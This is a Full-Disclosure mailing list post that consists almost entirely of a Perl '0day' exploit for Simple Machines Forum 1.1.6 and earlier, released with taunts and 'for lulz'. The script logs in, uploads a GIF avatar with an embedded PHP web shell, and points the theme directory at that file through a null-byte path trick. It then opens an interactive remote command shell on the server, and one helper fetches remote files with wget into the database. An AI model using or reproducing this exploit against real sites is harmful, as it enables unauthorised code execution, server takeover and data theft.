[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] [0day] Simple Machines Forum * <= 1.1.6 Code Execution



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

#!/usr/bin/perl
#
# @title: Simple Machines Forum Code Execution
# @versn: * <= 1.1.6
# @authr: ~elmysterio ( a.k.a us )
# @stats: DROPPED!!!!!!!
# @descp: In loving memory of the rare bone marrow disease that
killed rgod.
#         We can't thank you enough for killing a bug killer.
# @bug  : Sources/QueryString.php  & Sources/Themes.php w/
magic_quotes == Off
# @gr33t: m0rt's failure,  it never stops.
#
# C:\Documents and Settings\molest>perl
P:\advisories\smf\smf_localfileinclude.pl
# -s http://localhost/audit/smf116 -u regular -p test -d
# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
# [ii] User Id = 2
# [ii] Uploaded a shell...
# [cmd@win32]$ ver
#
# Microsoft Windows XP [Version 5.1.2600]
#
# [cmd@win32]$
#
#  FOR LULZ PURPOSE ONLY!!
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Long qw(:config no_ignore_case);

print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";

my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla
FireFox" );
my %parms = (   s => "",
                        d => 0,
                        x => sub { print "[**] Proxy found, using $_[1]\n"; $ua-
>proxy(['http'], $_[1]); },
                        u => "Gl0ria!!!",
                        p => "gl0ria\@herb3st" );

GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s";

if( !$parms{s} ) {
                die <<HELP
[ii] usage: $0 <parms>
        [-s]    Site        -> http://site.com/forums
        [-x]    Proxy       -> localhost:8118
        [-u]    Username    -> Gl0ria!!!
        [-p]    Password    -> gl0ria\@herb3st
        [-d]    Debug
HELP
}

my $shell =
chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
                        
chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
                        
chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
                        
chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
                        
chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
                        
chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00).
                        
chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
                        
chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        chr(0x00); $shell .= <<'EXIF';
<?php
 error_reporting(0);ini_set('max_execution_time',0);
 $x=trim(stripslashes($_SERVER[HTTP_SERVER_INFO]));$z=(ini_get('safe
_mode') or strpos(ini_get('disable_functions'),'passthru') ? '1' :
'0');
 if($x=='0998'){print '---info---'.PHP_OS.';'.$z.'---info---';exit;}
 print '---1243---';if($z){print eval($x);}else{print
passthru($x);}print '---3421---';exit;
?>
EXIF
                        $shell .= 
chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
                        
chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
                        
chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
                        
chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
                        
chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
                        
chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
                        
chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
                        
chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
                        
chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
                        
chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
                        
chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
                        
chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
                        
chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
                        
chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
                        
chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
                        
chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
                        
chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
                        
chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
                        
chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
                        
chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
                        
chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
                        
chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
                        
chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
                        
chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
                        
chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
                        
chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
                        
chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
                        
chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
                        
chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
                        
chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
                        
chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
                        
chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
                        
chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
                        
chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
                        
chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
                        
chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
                        
chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
                        
chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
                        
chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
                        
chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
                        
chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
                        
chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
                        
chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
                        
chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
                        
chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
                        
chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
                        
chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
                        
chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
                        
chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
                        
chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
                        
chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
                        
chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
                        
chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
                        
chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
                        
chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
                        
chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
                        
chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
                        
chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
                        
chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
                        
chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
                        
chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
                        
chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
                        
chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
                        
chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
                        
chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
                        
chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
                        
chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
                        
chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
                        
chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
                        
chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
                        
chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
                        chr(0x04).chr(0x00).chr(0x3b).chr(0x00);

## Logging in
my $ret = $ua->post("$parms{s}/index.php?action=login2",
                [
                        user                    => $parms{u},
                        passwrd                 => $parms{p},
                        cookielength    => -1
                ]);

## Getting id, sid and checking to see if we're logged on
$ret = $ua->get("$parms{s}/index.php?action=profile");

die "[!!] Wrong username/password\n"
        unless $ret->as_string !~ /The user whose profile you are trying
to view does not exist/;

die "[!!] Error getting session id\n"
        unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;

die "[!!] Error getting id\n"
        unless my($id) = $ret->as_string =~ /u=(\d+);/;

print "[ii] Session ID = $sid\n".
      "[ii] User Id = $id\n" if $parms{d};

## Checking for shell
$ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => "echo expl0ited");

&shell
        if $ret->as_string =~ /expl0ited/;

$ret = $ua->request(
                POST "$parms{s}/index.php?action=profile2",
                Content_Type    => 'multipart/form-data',
                Content                 =>
                [
                        avatar_choice   => "upload",
                        sc                              => $sid,
                        userID                  => $id,
                        sa                              => "forumProfile",
                        attachment              =>
                        [
                                undef,
                                "expl0ited.gif",
                                Content         => $shell,
                                "Content-Type"  => "image/gif"
                        ]
                ]);

## Updating Settings.php
$ret = $ua-
>get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=them
e_dir;val=./attachments/avatar_${id}.gif\%2500");

print "[ii] Uploaded a shell...\n"
    if $parms{d};

shell();

## lulz @ this shit.
sub shell {
        my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
    $ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => '0998' );
    ($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---
/s;

        die "[!!] magic_quotes is turned on\n"
                if (not defined $os or not defined $sh or $1 eq $id);

    $sh = $sh ? "php" : "cmd";
    $os = $os =~ /win/i ? "win32" : "unix";

    do {
                print "[$sh\@$os]\$ ";
                $cmd = chomp (my $cmd = <STDIN>);


                exit
                        unless $cmd !~ /^exit$/i;

        if( ($file) = $cmd =~ /^savefile (.*?) / ) {
            $cmd =~ s/savefile $1 //;
        } else { undef $file; }

        if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?)
(.*?)$/ ) {
            ($base) = $full =~ /\/(.*?)$/;
            $cmd = "cd attachments;wget $full; mysql --user=$user --
password=$pass < $base; rm $base;";
        }

        $ret = $ua-
>get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}"
, SERVER_INFO => $cmd);
        $ret->as_string =~ /---1243---(.*?)---3421---/s;
        print "$1\n";

        if( defined $file ) {
            open FILE, ">>", $file or die "[!!] Error writing to
file; $!\n";
            print FILE "Command Executed: $cmd\n".
                       "Host: $parms{s}\n$1\n";
            close FILE;
        }
        } while( $cmd !~ /^exit$/i );

        exit;
}
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkkSax8ACgkQxKkly4PzmN6NRwP/eL/Q6zKYoeuNmOlPk8QMesJjVUu5
oe+zFmLwOBexDYI0JRSUqPSyDglh9JsD270gwLMzwoE1jeg8tmeLtI6QmgTIXL+D0e6X
S/XQ+UFA6+2lq5QwGSOZpstbQAqgvM/rmynP0ayeu23Gmk9yMiOq32jgHRiBRDl1S/EW
6uD17+4=
=/Wd7
-----END PGP SIGNATURE-----

--
Aching back? Sore neck? Cick to learn how to manage your pain.
http://tagline.hushmail.com/fc/Ioyw6h4fPGBbhjqD6loOAXpR5I2hoUFDQcz2E2xsVbU1vXNQPDxTZ2/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/